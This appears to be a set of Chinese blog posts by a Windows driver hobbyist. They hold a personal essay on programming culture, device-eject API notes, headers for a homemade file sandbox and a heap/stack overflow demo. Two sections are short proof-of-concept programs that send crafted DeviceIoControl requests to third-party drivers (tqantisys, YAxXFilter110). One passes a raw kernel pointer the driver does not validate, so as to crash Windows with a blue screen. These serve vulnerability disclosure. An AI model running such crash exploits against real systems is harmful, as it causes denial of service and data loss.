#define MAX_BUFFER_LEN 1024*4
UCHAR ucbuffer[MAX_BUFFER_LEN];

void main()
{

HANDLE hDevice;
DWORD dwx = 0;
DWORD dwi = 0;

ZeroMemory( ucbuffer, MAX_BUFFER_LEN );
for( dwi= 0; dwi< MAX_BUFFER_LEN; dwi++)
{
   ucbuffer[dwi] = 0x90;
}
ucbuffer[MAX_BUFFER_LEN - 1] = 0x00;

hDevice = CreateFile("\\\\.\\tqantisys",GENERIC_READ|GENERIC_WRITE,0,
          0,OPEN_EXISTING,FILE_ATTRIBUTE_SYSTEM,0);

DeviceIoControl(hDevice,0x80002048,ucbuffer,MAX_BUFFER_LEN,NULL,0,&dwx,0);

CloseHandle(hDevice);
}

上面的文字我是用心写的，虽然看起来很幼稚。也该好好总结了，大学里我写了不少代码，后来也比较关注代码的质量，所以也往这方面努力。搞驱动的，搞内核的，有些人觉得越难就越有技术，越能显耀自己，曾经我也是这么想的，后来发现自己的智商有限，经受不住复杂的东西，也慢慢对这些所谓高深的技术不再那么执着。我看了些大众的软件，发现也不是说特别需要高深的知识啊。后来我听到过一句话， “软件本身是没有价值的”，有所感悟，如果软件本身不能为用户提供有用的服务，那这个软件再有技术含量也是没有价值的，当然作为一个疯狂的技术迷他也许不顾这些，或许今天的什么WS技术的确能有用途，比如搞挂啊，写病毒啊，但对于我这个不染这些东西的人来讲，或许那些东西对我来说还没有真正体现出价值。即使有价值，但我也得认清现实
现在搞技术的，无论驱动也好，其他也好。别人发的一些文章我总能看到这么一些字句 “本人是菜鸟 。。。”，好像说上这么一句下面的回复就会好点，不然不是被骂没技术，几万年的东西就是被骂S.B之类的。接着的口水战就像是娱乐了。对于一些新手来说，或许能激发他们的动力，但或者也能打击他们。我个人还是比较喜欢鼓励人的，因为我觉得一句简单的鼓励回复是徒手之劳。
当然有一些人可能抄了代码不写出原作者。这在开始我觉得很正常的，因为初学者觉得他们的目标是读懂代码，理解代码，他们在这个过程中付出了努力，所以很自然地，人也是有虚荣心的，需要别人的鲜花来满足自己的，所以为隐藏些东西，我觉得这不算是虚伪。但我也不提倡这些，因为久了就养成个坏习惯，太浮躁了。
就技术而言，每个人永远不是最差的，也不是最好的，比你差的人说你牛的时候，他说的是实话，有些人就认为自己很牛了，接着就是我们看到的所谓的装.B.，其实他们也不想，但人们认为你是牛，你就得千方百计的牛啊，发点代码，写点什么东西，胡乱回答下问题。如果能发现这点问题的人就会努力学习，浮躁的人将继续装下去，所以我们要理解这类人，其实他们挺累的。所以一般情况下不要随便去膜拜人，鼓励是好的方式，膜拜就会给他压力。而有些人你膜拜下他后，你在他的眼里是不会成长的菜鸟，至少他要保持被你膜拜的身份。
其实我是挺自卑的，自卑的人有俩种表现形式，疯狂的表达自己，努力让别人认可。或者沉默再沉默。无论哪一种形式我觉得都挺累。人一定要真正认可自己的价值，不被环境所制才能活得潇洒。不然永远是陷在一个圈里不能自拔。牺牲的是青春。
关于牛人，我觉得牛人不是技术有多牛，而是明确自己的方向，内心坚定地坚持着，努力着。我最敬佩这些人，因为我知道没有什么东西是学不来的，因为我知道内心的坚定足与让他们战胜任何的困难。
低调和高调是个人性格问题，没必要就觉得低调的就值得尊敬的，高调的就该打击的，如果别人高调没伤着你，碍着你，你还不爽，那就是你个人心态问题了。你无法改变别人的，终究还是得调整自己。
2010年来了，也要工作了，去掉浮躁，努力踏实走好每一步，写好质量代码，加强用户体验，对自己每一行代码负责。我从自己的内心已经摆正自己的位置，我一直在路上，我一直在努力。 当疯狂过后，也该静下心来问自己，一切为了什么。这是个必须清晰回答的问题，因为时间有限，年龄也慢慢增长，难道就没想过改变下生活方式吗？没有什么东西可以永恒，没有什么东西可以当做全部。现实还是很残酷，需要我们去努力奋斗。
写这点文字的时候，外面的很冷，在宿舍里还是比较暖和的，写完的时候，也该走出去了。不能贪图安逸，这样的日子很单调和乏味，虽然外面很冷，走出去却能看到蓝天，绿树，车辆等等，只是愿不愿意走出去罢了。打开窗户，射进一线阳关。

HotPlugEjectDevice 调用CM系统函数。

DDK有相关函数在 cfgmgr32.h定义。
CM_Locate_DevNode 函数获得设备节点的设备实例句柄，关联本机指定的设备实例标识符。

什么ID之类估计跟注册表有关。
CMAPI CONFIGRET WINAPI CM_Locate_DevNode(    OUT PDEVINST pdnDevInst,    IN DEVINSTID pDeviceID, OPTIONAL    IN ULONG ulFlags    );

If the operation succeeds, CM_Locate_DevNode returns CR_SUCCESS
#define CR_SUCCESS                  (0x00000000)

成功调用 CM_Locate_DevNode，获得设备节点的设备实例句柄后调用 CM_Request_Device_Eject_ExW

接着失败用 VetoedRemovalUI ---》》弹出无法删除的xx

明天考试，没时间仔细研究。哪位有兴趣可以跟下它如何跟驱动交互的。也许你就会找到解决 无法弹出的办法出来

原因： 没有对PASS的地址进行 可信验证，本来应该只是 RING 3地址的，是不允许传入 0X80000000以上的地址的，但驱动没有这一条件的验证，导致传入特殊的指针后，内核的数据被写入，但数据是无法控制的，也只能引发BSOD

CODE：

一般不会触发

注意： YASBOX的进程必须关闭，或者其他办法XX，下面代码才能引发BSOD

#include
#include
#include

#define IOCTL_BSOD_1   CTL_CODE(FILE_DEVICE_UNKNOWN,0x802, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

void main()
{

HANDLE hMapFile;

hMapFile = CreateFileMapping(
                 INVALID_HANDLE_VALUE,    // use paging file
                 NULL,                    // default security
                 PAGE_READWRITE,          // read/write access
                 0,                       // max. object size
                 256,                // buffer size
                 "YasXBox_Section_Object");

if( GetLastError() == ERROR_ALREADY_EXISTS)
{
   ExitProcess(0);
}

HANDLE hDevice;
DWORD dwTid = 0;

hDevice = CreateFile("\\\\.\\YAxXFilter110",GENERIC_READ|GENERIC_WRITE,0,
          0,OPEN_EXISTING,FILE_ATTRIBUTE_SYSTEM,0);

DeviceIoControl(hDevice,IOCTL_BSOD_1,(void*)0x818dc8d8, 0x10c ,NULL,0,&dwTid,0);

CloseHandle(hDevice);

::ShellExecute(NULL, "open", "NOTEPAD.EXE", NULL, NULL, SW_RESTORE); //NEED

// BSOD
}

之前计划写的沙盘系统，刚写好文件部分，也不算太完善，碰巧有人问起，遂贴上代码大家看去，你可以在此基础上完善之。 代码没什么WS技术，但做文件沙盘还是有不少问题的，需要的朋友可以下， 贴上主要头文件。基本代码是围绕这个头文件展开的。

代码任何问题可以提出来

YasVps_SRC下载

PHYSICAL_ADDRESS
MmGetPhysicalAddress(
    IN PVOID BaseAddress
    );

NTKERNELAPI
NTSTATUS
MmMarkPhysicalMemoryAsGood (
    __in PPHYSICAL_ADDRESS StartAddress,
    __inout PLARGE_INTEGER NumberOfBytes
    );

PVOID
MmMapIoSpace(
    IN PHYSICAL_ADDRESS PhysicalAddress,
    IN ULONG NumberOfBytes,
    IN MEMORY_CACHING_TYPE CacheType
    );

你可以打开cmd, 然后 start 命令来启动进程，这样创建的进程就会受到YASVPS的限制

附上一个头文件。。定义了相关的数据结构

#pragma once

// ucReseaon :
//
// Basic
//
#define YASVPS_CREATE_FILE     0x00

#define YASVPS_MOVE_FILE       0x01
#define YASVPS_REPLACE_FILE    0x02
#define YASVPS_RENAME_FILE     0x03
#define YASVPS_WRITE_FILE      0x04

//
//Option
//
#define YASVPS_SETFILE_BASICINFO 0x05
#define YASVPS_SETFILE_ENDINFO   0x06
#define YASVPS_SETFILE_POSINFO   0x07
#define YASVPS_SETFILE_SECINFO   0x08

//
//删除以存在文件时追踪,
//对已存在文件的删除是不可恢复的，所以这个链表跟进程的生命周期一样，而且只能添加节点不能删除。
//
typedef struct __YASVPS_DELETETRACE
{
struct __YASVPS_DELETETRACE* lpNext;
ULONG uPid;
ULONG uNew;
CHAR lpszDelFilePath[YASVPS_MAX_PATH];

}YASVPS_DELETETRACE, *PYASVPS_DELETETRACE;

//
//创建新文件时追踪,添加节点前，先判断文件是否 “删除文件追踪” 存在，若存在，则删除对应节点
//删除文件时，需要查找这个表的信息，如果发现删除的是自己创建的文件，则允许删除。并删除相关跟踪节点
//同样的任何修改文件也需要先找这张表
//外界不应该操作在YASVPS中运行进程创建的文件。
//

/*
dir 规则：
如果在枚举目录文件时， “删除以存在文件” 中有文件在对应的目录中。
如果在YASVPS_CREATEFILETRACE 没有相应节点，则过滤掉删除的文件，不显示
否则显示之
*/

/*
覆盖文件：
覆盖新创建文件： 直接允许
覆盖已存在文件： 相当于 删除原来存在的文件，再创建一个新的文件。
*/

/*
移动已存在文件： eg: c:\123.exe --->> c:\windows\123.exe --->> c:\123.exe
相当于删除文件再创建文件。
*/

//
//修改以存在文件时追踪。删除下面匹配的文件时，相应节点也要删除。
//

typedef struct __YASVPS_CREATETRACE
{

//
//任何修改文件也需要先找这张表,再根据 ucReseaon 做相应的操作
//

struct __YASVPS_CREATETRACE* lpNext;

ULONG uPid; //进程PID
HANDLE hFile;
PFILE_OBJECT lpFileObj; //保留

/*
    ucReseaon :
    #define YASVPS_CREATE_FILE     0x00
    #define YASVPS_MOVE_FILE       0x01
    #define YASVPS_REPLACE_FILE    0x02
    #define YASVPS_RENAME_FILE     0x03
    #define YASVPS_WRITE_FILE      0x04
*/

UCHAR ucReseaon;

/*
ucReseaon = YASVPS_CREATE_FILE
eg:    lpszCreatePath : C:\123.exe
重定向 lpszTracePath : C:\YasVPS\C:\123.exe
之后 修改名字为 hello.exe 则 lpszCreatePath : C:\hello.exe
对YASVPS_CREATE_FILE 文件的操作，都直接PASS， 删除文件时，需要删除lpszLinkPath,
并删除对应YASVPS_CREATETRACE节点

    “外界不应该操作在YASVPS中运行进程创建的文件！！！！！”
*/

//
//重命名/移动文件/覆盖文件/创建后后新的路径
//
CHAR lpszNewPath[YASVPS_MAX_PATH];
//
//指向的原始路径, 当该文件被写时，这个地方为TMP文件,写的文件不能超过10M(*)
//
CHAR lpszLinkPath[YASVPS_MAX_PATH];
                                    
//
//下面的暂时保留，不支持，主要是从效率和节省内存考虑
//
/* FILE_BASIC_INFORMATION stFileBasicInfo;
FILE_END_OF_FILE_INFORMATION szFileEndInfo;
*/
}YASVPS_CREATETRACE, *PYASVPS_CREATETRACE;

可执行文件下载

SHFileOperation(&lpsh);
SHELL32!MoveCopyDriver
SHELL32!DTBuild
SHELL32!DTPathToDTNode
FindFirstFileExW

它确定文件存在不是OPENFILE，而是用 FindFirstFileExW
RtlDosPathNameToNtPathName_U ， 取得目录和 文件名。
NtOpenFile 目录，并把句柄传入 ZwQueryDirectoryFile， IN PUNICODE_STRING FileName OPTIONAL 为文件名，这个平时很少注意，这样它是根据 ZwQueryDirectoryFile来确定文件是否存在的，
在FSD中。文件名为 QUERY_DIRECTORY：：FileName，不为NULL了。
typedef struct tag_QUERY_DIRECTORY
{
ULONG Length;
PUNICODE_STRING FileName;
FILE_INFORMATION_CLASS FileInformationClass;
ULONG FileIndex;
} QUERY_DIRECTORY, *PQUERY_DIRECTORY;

提取到的FILE_OBJECT得路径也只能是目录了。

关于是什么用。。可能你做某些东西时会碰到这样的问题。。贴出来SHARE下。。

使用，用一个loader把yastr.dll注入到目标进程就可以。。。dbgview看输出信息。。
可以获取到的信息
线程的CONTEXT, 调用栈， SEH处理，栈的开始和结束。
进程堆得信息。

yastr.dll会替换掉异常处理函数，所以程序出错时会获得通知。

下图是下面xXXX代码的输出

HANDLE hHeap;
   hHeap = HeapCreate(HEAP_GENERATE_EXCEPTIONS, 0x10000, 0xfffff);

   char* buf = (char*)HeapAlloc(hHeap, 0,2);
   printf("mybuf addr = %p\n",buf);

CopyMemory( buf, mybuf, 100); // 堆问题

   CHAR sz0[6]；

   strcpy( sz0, "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");//栈问题

下载